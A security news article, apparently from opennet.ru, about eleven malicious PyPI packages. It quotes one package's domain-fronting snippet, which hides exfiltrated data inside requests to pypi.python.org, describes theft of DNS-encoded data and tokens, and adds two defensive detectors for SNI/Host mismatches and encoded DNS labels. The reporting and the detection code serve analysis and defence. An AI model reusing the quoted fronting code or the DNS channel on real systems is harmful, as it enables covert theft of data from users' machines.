Malicious libraries identified in the PyPI repository that use the PyPI CDN to hide their communication channel.

In the PyPI (Python Package Index) repository, 11 packages containing malicious code were identified. Before the problem was detected, the packages had been downloaded about 38 times in total. The malicious packages are notable for using advanced techniques to hide the communication channel to the attackers' servers.

  • importantpackage (6305 downloads), important-package (12897) - established a connection to an external server under the guise of connecting to pypi.python.org in order to give the attackers shell access to the system (reverse shell), and used the trevorc2 tool to disguise the communication channel.
  • pptest (10001), ipboards (946) - used DNS as the communication channel for sending information about the system (in the first package the hostname, working directory, and internal and external IP addresses; in the second, the username and hostname).
  • owlmoon (3285), DiscordSafety (557), yiffparty (1859) - located the Discord token on the system and sent it to an external host.
  • trrfab (287) - sent an identifier, the hostname and the contents of /etc/passwd, /etc/hosts and /home to an external host.
  • 10Cent10 (490) - established a reverse shell connection to an external host.
  • yandex-yt (4183) - displayed a message claiming the system was compromised and redirected to a page with further information, served via nda.ya.ru (api.ya.cc).

Of particular note is the method of reaching external hosts used in importantpackage and important-package, which abused the Fastly content delivery network that serves the PyPI repository to disguise their activity. The requests were actually sent to the pypi.python.org server (with python.org given as the server name in the SNI of the HTTPS connection), but the HTTP "Host" header carried the name of a server controlled by the attackers (sec.forward.io.global.prod.fastly.net). The content delivery network then forwarded the request to the attackers' server, reusing the parameters of the TLS connection to pypi.python.org when relaying the data.

The PyPI infrastructure runs behind the Fastly content delivery network, which uses the Varnish transparent proxy to cache typical requests and terminates TLS at the CDN level rather than at the origin servers, relaying HTTPS requests through the proxy. Regardless of the requested host, requests arrive at the proxy, which identifies the intended host from the HTTP "Host" header; the hosts' domain names resolve to CDN load-balancer IP addresses that are shared by all Fastly customers.

The attackers' server is likewise registered with the Fastly CDN, which offers free plans to anyone and permits anonymous sign-up. Notably, the same scheme is used for sending requests to the victim when setting up the reverse shell, only initiated from the attacker's side. From the outside, the exchange with the attackers' server looks like a legitimate session with the PyPI repository, encrypted under PyPI's TLS certificate. A similar technique, known as "domain fronting", has previously been used to hide the hostname when bypassing blocking: it exploits the ability offered by some CDNs to open an HTTPS connection while presenting a decoy host in the SNI and passing the name of the actually requested host in the HTTP Host header inside the TLS session.

To disguise the malicious activity further, the TrevorC2 framework was also used so that communication with the server resembles ordinary web browsing; for example, malicious requests were sent under the guise of fetching the image "https://pypi.python.org/images?guid=", with the exfiltrated information carried in the guid parameter. The request was built as follows (the package's own snippet, with the import it relies on):

    from urllib import request

    # b64_payload: base64-encoded data collected by the package (built elsewhere in its code)
    # URL and SNI name pypi.python.org; the Host header names the attackers' Fastly service
    url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
    r = request.Request(url, headers={'Host': "psec.forward.io.global.prod.fastly.net"})
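The fronting trick described above, including the disguised TrevorC2 image request, leaves one observable seam: the TLS SNI says pypi.python.org while the HTTP Host header names a different, attacker-registered Fastly service. The following check is an added example, not code from the article or from the malicious packages; it scans proxy or TLS-inspection records for that SNI/Host disagreement. The key=value log format, the client and server addresses (documentation range) and the sample guid value are constructed for the example; the Fastly service name is the one quoted in the article.

```python
"""Added detection example (not code from the article or the malicious
packages): flag HTTPS requests whose TLS SNI and HTTP Host header disagree,
the observable seam of the domain-fronting trick described above.

Assumes a proxy / TLS-inspection log in a constructed key=value format;
real products log in their own schemas, so only parse_line() would change."""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "record_id sni host reason")

# key=value tokens; a value is either quoted or a run of non-space characters
_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Shared CDN service suffix that a Host header should never name directly
# when the SNI claims a customer domain (suffix taken from the article).
SHARED_CDN_SUFFIXES = (".global.prod.fastly.net",)


def parse_line(line):
    return {k: v.strip('"') for k, v in _KV.findall(line)}


def registrable(name):
    """Last-two-labels approximation of the registrable domain; enough for
    pypi.python.org vs *.fastly.net. Production code should use the
    public suffix list."""
    parts = name.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])


def check_record(rec):
    """Return a Finding when SNI and Host name different registrable domains."""
    sni = rec.get("sni", "").lower()
    host = rec.get("host", "").lower().split(":")[0]  # drop an explicit port
    if not sni or not host or sni == host:
        return None
    if registrable(sni) == registrable(host):
        return None  # e.g. SNI www.python.org with Host python.org: benign
    reason = "tls sni / http host mismatch"
    if host.endswith(SHARED_CDN_SUFFIXES):
        reason += " (Host names a shared CDN service, fronting suspected)"
    return Finding(rec.get("id"), sni, host, reason)


def scan(lines):
    findings = []
    for line in lines:
        f = check_record(parse_line(line))
        if f is not None:
            findings.append(f)
    return findings


# Constructed sample records. dst uses the 203.0.113.0/24 documentation range;
# record 2 mirrors the disguised TrevorC2 image request quoted in the article.
SAMPLE_LOG = [
    'id=1 src=10.0.0.5 dst=203.0.113.10 sni=pypi.python.org host=pypi.python.org path=/simple/requests/',
    'id=2 src=10.0.0.5 dst=203.0.113.10 sni=pypi.python.org host=sec.forward.io.global.prod.fastly.net path="/images?guid=aGVsbG8="',
    'id=3 src=10.0.0.7 dst=203.0.113.10 sni=www.python.org host=python.org path=/',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"record {f.record_id}: sni={f.sni} host={f.host} -> {f.reason}")
```

Only record 2 is reported: record 1 has matching names, and record 3 differs only within the same registrable domain, which is how many sites legitimately behave. The check needs visibility into the Host header, so it applies where TLS is inspected at an egress proxy; without that, the seam is invisible and the traffic looks like a normal PyPI session, which is exactly what the packages rely on.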

The pptest and ipboards packages used a different way of hiding their network activity, based on encoding the collected data into queries sent to a DNS server. The malware transmits information by issuing DNS queries such as "nu4timjagq4fimbuhe.example.com", in which the data destined for the control server is base64-encoded into the subdomain label. The attacker receives these messages by controlling the authoritative DNS server for the example.com domain.
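This exfiltration channel can be spotted in resolver logs: encoded chunks produce long, high-entropy leftmost labels, and a tunnelling host generates many distinct such labels under one parent zone. The following scanner is an added example, not code from the article or from the packages; its query-log format ("<client> <qtype> <qname>"), the client addresses and all query names other than the one quoted in the article are constructed, and the thresholds are illustrative starting points rather than values from the article.

```python
"""Added detection example (not code from the article or the malicious
packages): spot DNS exfiltration of the kind described above, where data is
encoded into the leftmost label of the query name.

Input is a constructed query log with lines of the form
"<client> <qtype> <qname>"; real resolvers use their own log formats,
so only parse_line() would need adapting."""
import math
from collections import defaultdict

MIN_LABEL_LEN = 16       # encoded chunks tend to be long ...
MIN_ENTROPY = 3.0        # ... and random-looking (bits per character)
MIN_UNIQUE_PER_ZONE = 2  # tunnelling yields many distinct labels per parent zone


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for an empty or uniform string)."""
    if not s:
        return 0.0
    n = len(s)
    counts = {ch: s.count(ch) for ch in set(s)}
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_encoded(label):
    """Long and high-entropy: the shape of a base64/base32 chunk, not a word."""
    return len(label) >= MIN_LABEL_LEN and shannon_entropy(label) >= MIN_ENTROPY


def parent_zone(qname):
    """Everything after the leftmost label (crude; use a public-suffix list
    in production so that example.co.uk is not split wrongly)."""
    return qname.split(".", 1)[1]


def parse_line(line):
    client, qtype, qname = line.split()
    return client, qtype, qname.lower().rstrip(".")


def scan_dns_log(lines):
    """Return {(client, zone): [suspicious labels]} for every client/zone pair
    that issued at least MIN_UNIQUE_PER_ZONE distinct encoded-looking labels."""
    seen = defaultdict(set)
    for line in lines:
        client, _qtype, qname = parse_line(line)
        if "." not in qname:
            continue
        label = qname.split(".", 1)[0]
        if looks_encoded(label):
            seen[(client, parent_zone(qname))].add(label)
    return {k: sorted(v) for k, v in seen.items() if len(v) >= MIN_UNIQUE_PER_ZONE}


# Constructed sample log; the second query name is the one quoted in the article.
DNS_LOG = [
    "10.0.0.5 A www.example.com",
    "10.0.0.5 A nu4timjagq4fimbuhe.example.com",
    "10.0.0.5 A mfrggzdfmztwq2lknnwg23tpobxxe.example.com",
    "10.0.0.5 A files.pythonhosted.org",
    "10.0.0.9 A mail.example.net",
]

if __name__ == "__main__":
    for (client, zone), labels in scan_dns_log(DNS_LOG).items():
        print(f"{client} -> {zone}: {len(labels)} encoded-looking labels {labels}")
```

Only the 10.0.0.5 / example.com pair is reported, because both of its long labels look random while www, files and mail are short dictionary words. Counting distinct labels per client and zone rather than alerting on single queries keeps CDN and anti-spam hostnames, which can also be long and hash-like but repeat, from drowning the signal; the DNS-level view also catches this channel regardless of which TLS or CDN disguise the malware uses for its other traffic.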

Source: opennet.ru